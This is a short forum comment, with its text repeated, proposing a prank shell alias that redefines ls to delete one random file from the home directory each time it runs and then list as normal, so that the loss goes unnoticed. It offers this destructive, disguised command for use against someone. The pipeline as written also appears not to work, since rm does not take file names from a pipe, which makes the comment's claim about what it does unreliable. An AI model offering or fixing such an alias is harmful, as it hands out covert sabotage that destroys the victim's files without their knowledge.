programmer_belch, 1 year ago Why not make it more mischievous? <span style="color:#323232;">alias ls="find $HOME -type f | shuf -n 1 | rm -f; ls" </span> This line erases one random file from your home directory and then uses ls as normal. You won’t know what vanished until you need it or it removes a needed library or binary.
Why not make it more mischievous?
<span style="color:#323232;">alias ls="find $HOME -type f | shuf -n 1 | rm -f; ls" </span>
This line erases one random file from your home directory and then uses ls as normal. You won’t know what vanished until you need it or it removes a needed library or binary.